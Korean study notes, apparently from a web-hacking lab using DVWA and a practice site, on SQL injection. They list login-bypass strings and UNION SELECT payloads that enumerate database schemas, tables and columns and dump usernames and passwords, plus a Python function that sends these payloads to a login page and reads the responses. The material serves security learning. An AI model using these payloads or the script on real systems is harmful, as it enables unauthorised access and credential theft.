그누보드와 dvwa의 업로드를 활용해서
업로드 페이지 구현
파일을 암호화 해보자


SQL인젝션 공격해보기

select from
select * from users;
select idx,id_param from users;
select id_param from users where id_param='admin';
1' or '1'='1
admin' or '1'='1

insert into
update set
delete from

1' or '1'='1
1' UNION SELECT name,pw from users#
1' UNION SELECT 1,2#
1' ORDER BY 1#
' UNION SELECT schema_name,2 from information_schema.schemata#
' UNION SELECT table_name,2 from information_schema.tables where table_schema='dvwa'#
' UNION SELECT column_name,2 from information_schema.columns where table_schema='dvwa' and table_name='users'#
' UNION SELECT user,password from users#

md5 자동화 프로그램 만들기

웹 공격 SQL
request
response
' UNION SELECT schema_name,2 from information_schema.schemata#
' UNION SELECT table_name,2 from information_schema.tables where table_schema='web2'#
' UNION SELECT column_name,2 from information_schema.columns where table_schema='web2' and table_name='users'#
' UNION SELECT id_param,pw_param from users#
' UNION SELECT pw_param,id_param from users#
업로드 공격

    def sql(self):
        result=[]
        target="http://web2.st.kr/auth/login2_ok.php"
        sql_in=["1' or '1'='1","' UNION SELECT schema_name,2 from information_schema.schemata#","' UNION SELECT table_name,2 from information_schema.tables where table_schema='web2'#","' UNION SELECT column_name,2 from information_schema.columns where table_schema='web2' and table_name='users'#","' UNION SELECT id_param,pw_param from users#","' UNION SELECT pw_param,id_param from users#"]
        for sql in sql_in:
            payload={"id_param":sql,"pw_param":sql}
           # print(sql)
            response=requests.post(target, data=payload)
           # print(response.text)#
            if(response.text == "OK"):
                print("SQL OK")
            matches = re.search(r'OK[\s]*
(.*?)
', response.text, re.DOTALL)
            if matches:
               result_text = matches.group(1)
               print("OK:", result_text)

            else:
               print("No OK tags found.")